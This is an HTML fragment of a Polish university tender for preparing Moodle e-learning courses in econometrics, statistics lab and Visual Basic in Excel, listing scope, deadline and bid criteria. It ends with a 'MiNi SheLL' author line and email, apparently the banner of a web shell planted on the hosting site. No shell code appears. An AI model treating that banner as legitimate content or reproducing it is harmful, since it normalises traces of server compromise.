Przygotowanie w systemie Moodle i udostępnienie studentom materiałów teoretycznych, przykładowych zadań z rozwiązaniami, zadań ćwiczeniowych do samodzielnego rozwiązania, materiałów powtórkowych, testów sprawdzających wiedzę oraz szeregu innych materiałów w formie interaktywnej w postaci e-learningu stanowiących razem kompletny i spójny materiał stanowiący podstawę do przeprowadzenia zajęć kursu Ekonometria (30 godzin zajęć) w formie e-learningu dla studentów III i IV roku studiów dziennych Matematyki. Program szkolenia powinien być zgodny z programem wykładu zamieszczonym na stronie http://www.math.uni.wroc.pl/studia/przedmioty/. Każdy komplet materiałów powinien zawierać: materiały teoretyczne z całości kursu, przykłady zadań z rozwiązaniami, co najmniej 10 zadań ćwiczeniowych do samodzielnego rozwiązania przez Studenta, co najmniej 2 testy sprawdzające wiedzę i inne materiały adekwatnie do opracowywanych zagadnień. Przygotowane i udostępnione materiały powinny pozwolić studentom na uzyskanie wiedzy pozwalającej na otrzymanie bardzo dobrego stopnia w trakcie egzaminu końcowego/zaliczeniowego z tego przedmiotu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. wiedza i doświadczenie związane z przygotowaniem i przeprowadzeniem zajęć z zakresu Matematyki na poziomie wyższym ze szczególnym uwzględnieniem temat - 35</li>
<li>3. wiedza, doświadczenie oraz praktyczne umiejętności związane z pisaniem programów z dziedziny e-learningu w systemie Moodle - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przygotowanie zajęć w postaci e-learningu: Pracownia statystyczna 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie zajęć w postaci e-learningu: Pracownia statystyczna 1.
Przygotowanie w systemie Moodle i udostępnienie studentom materiałów teoretycznych, przykładowych zadań z rozwiązaniami, zadań ćwiczeniowych do samodzielnego rozwiązania, materiałów powtórkowych, testów sprawdzających wiedzę oraz szeregu innych materiałów w formie interaktywnej w postaci e-learningu stanowiących razem kompletny i spójny materiał stanowiący podstawę do przeprowadzenia zajęć kursu Pracownia Statystyczna 1 (30 godzin zajęć) w formie e-learningu dla studentów IV roku studiów dziennych Matematyki. Program szkolenia powinien być zgodny z programem wykładu zamieszczonym na stronie http://www.math.uni.wroc.pl/studia/przedmioty/. Każdy komplet materiałów powinien zawierać: materiały teoretyczne z całości kursu, przykłady zadań z rozwiązaniami, co najmniej 10 zadań ćwiczeniowych do samodzielnego rozwiązania przez Studenta, co najmniej 2 testy sprawdzające wiedzę i inne materiały adekwatnie do opracowywanych zagadnień. Przygotowane i udostępnione materiały powinny pozwolić studentom na uzyskanie wiedzy pozwalającej na otrzymanie bardzo dobrego stopnia w trakcie egzaminu końcowego/zaliczeniowego z tego przedmiotu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. wiedza i doświadczenie związane z przygotowaniem i przeprowadzeniem zajęć z zakresu Matematyki na poziomie wyższym ze szczególnym uwzględnieniem temat - 35</li>
<li>3. wiedza, doświadczenie oraz praktyczne umiejętności związane z pisaniem programów z dziedziny e-learningu w systemie Moodle - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przygotowanie zajęć w postaci e-learningu: Visual Basic w Excelu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie zajęć w postaci e-learningu: Visual Basic w Excelu.
Przygotowanie w systemie Moodle i udostępnienie studentom materiałów teoretycznych, przykładowych zadań z rozwiązaniami, zadań ćwiczeniowych do samodzielnego rozwiązania, materiałów powtórkowych, testów sprawdzających wiedzę oraz szeregu innych materiałów w formie interaktywnej w postaci e-learningu stanowiących razem kompletny i spójny materiał stanowiący podstawę do przeprowadzenia zajęć kursu Visual Basic w Excelu (30 godzin zajęć) w formie e-learningu dla studentów III i IV roku studiów dziennych Matematyki. Program szkolenia powinien być zgodny z programem wykładu zamieszczonym na stronie http://www.math.uni.wroc.pl/studia/przedmioty/. Każdy komplet materiałów powinien zawierać: materiały teoretyczne z całości kursu, przykłady zadań z rozwiązaniami, co najmniej 10 zadań ćwiczeniowych do samodzielnego rozwiązania przez Studenta, co najmniej 2 testy sprawdzające wiedzę i inne materiały adekwatnie do opracowywanych zagadnień. Przygotowane i udostępnione materiały powinny pozwolić studentom na uzyskanie wiedzy pozwalającej na otrzymanie bardzo dobrego stopnia w trakcie egzaminu końcowego/zaliczeniowego z tego przedmiotu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. wiedza i doświadczenie związane z przygotowaniem i przeprowadzeniem zajęć z zakresu Matematyki na poziomie wyższym ze szczególnym uwzględnieniem temat - 35</li>
<li>3. wiedza, doświadczenie oraz praktyczne umiejętności związane z pisaniem programów z dziedziny e-learningu w systemie Moodle - 35</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com